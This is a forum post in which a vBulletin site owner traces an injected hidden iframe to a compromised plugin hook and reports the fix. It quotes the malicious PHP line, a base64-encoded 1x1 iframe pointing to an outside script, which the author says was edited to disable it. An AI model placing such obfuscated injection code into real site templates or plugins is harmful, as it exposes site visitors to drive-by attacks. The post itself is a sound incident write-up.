Having done a little more hunting around it seems that this problem lies with me using an older version of vbseo:
http://www.vbulletin.com/forum/showt...ease-some-tips.
However, I have upgraded the site and also run the suggested template reparser from here:
https://vborg.vbsupport.ru/showthrea...parse+template
But the iframe is still present on VB powered pages. Current searching through the DB to see if it is in there somewhere.
--------------- Added [DATE]1267912363[/DATE] at [TIME]1267912363[/TIME] ---------------
Well I am still at a loss
I have upgraded vBulletin to the latest 3.8 version, I have upgraded vbseo to the latest version.
I can only imagine that this is coming from the DB somehow - suppose I should keep looking through all the tables
--------------- Added [DATE]1267916034[/DATE] at [TIME]1267916034[/TIME] ---------------
Fixed
After upgrading the 3.8.4 PL1 and upgrading vbSEO the hole was plugged however the iframe was still present.
After searching through templates looking for "iframe" and not finding anything, I then started to look through files. After not finding anything in there I realised that I should have tried something else first, disable all hooks.
After doing this the problem was fixed, so the issue was with one of the plugins/products. By a process of elimation I tied this down to the vBSEO Downloads II product, specifically the hook onto global_complete.
At the end of the PHP code for this I found the following PHP code:
PHP Code:
echo base64_decode("PGlmcmFtZSBuYW1lPSJmcmEiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZy
YW1lYm9yZGVyPSJubyIgbDSWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSJodHRw
Oi8vd3d3LmtvbGVrLmNvLmNjL3NlLnBocCI+PC9pZnJhbWU+");
I have edited the base64 string to prevent anybody doing something by accident
That base64 string contains the markup for the iframe, which is why DB, template, phrase etc searches turned up nothing when searching for "iframe" or other strings in the malicious code.
All fixed, panic over
Moral to this story, keep your software up to date - this was my fault
Moral #2 to this story - if this happens to you, just as a precaution change all your passwords, ftp, cpanel, plesk, forum accounts etc etc etc etc etc.